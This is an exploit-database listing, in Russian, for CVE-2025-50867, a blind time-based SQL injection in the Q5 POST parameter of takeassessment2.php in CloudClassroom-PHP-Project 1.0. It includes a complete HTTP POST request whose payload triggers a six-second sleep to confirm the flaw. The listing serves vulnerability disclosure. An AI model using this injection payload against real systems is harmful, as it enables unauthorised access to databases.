Sploitus

Exploit for CVE-2025-50867

kitploit · 2026-09-05

Exploit Code

MARKDOWN52 lines
## https://sploitus.com/exploit?id=KITPLOIT:TOOLS-GITHUB-SACX-7-CVE-2025-50867
Уязвимость SQL-инъекции существует в конечной точке takeassessment2.php проекта CloudClassroom-PHP-Project 1.0, где параметр POST Q5 напрямую встраивается в SQL-запросы без санитизации.

* * *

Тип уязвимости :

SQL Injection

* * *

Поставщик продукта :

https://github.com/mathurvishal/CloudClassroom-PHP-Project

* * *

База кода затронутого продукта :

https://github.com/mathurvishal/CloudClassroom-PHP-Project 1.0 - https://github.com/mathurvishal/CloudClassroom-PHP-Project 1.0

* * *

Затронутый компонент :

takeassessment2.php, параметр POST Q5, логика SQL-запроса

* * *

## Тип атаки : Удаленная

Векторы атаки :

Для эксплуатации этой уязвимости злоумышленник отправляет вредоносный POST-запрос к /CloudClassroom-PHP-Project-master/takeassessment2.php с полезной нагрузкой в параметре Q5, которая вызывает временную задержку в обработке SQL (слепая time-based SQL-инъекция).

POST Request:

POST /CloudClassroom-PHP-Project-master/takeassessment2.php?exid=4 HTTP/1.1 Host: localhost Content-Type: application/x-www-form-urlencoded

Q1=555&Q2=555&Q3=555&Q4=555&Q5=5550'XOR(555*if(now()=sysdate(),sleep(6),0))XOR'Z&done= Это вызывает шестисекундную задержку в ответе, что подтверждает уязвимость.

* * *

Ссылка :

https://owasp.org/www-community/attacks/SQL_Injection

* * *

Обнаружил : saurabh solanki

LinkedIn : https://www.linkedin.com/in/saurabh-b294b21aa/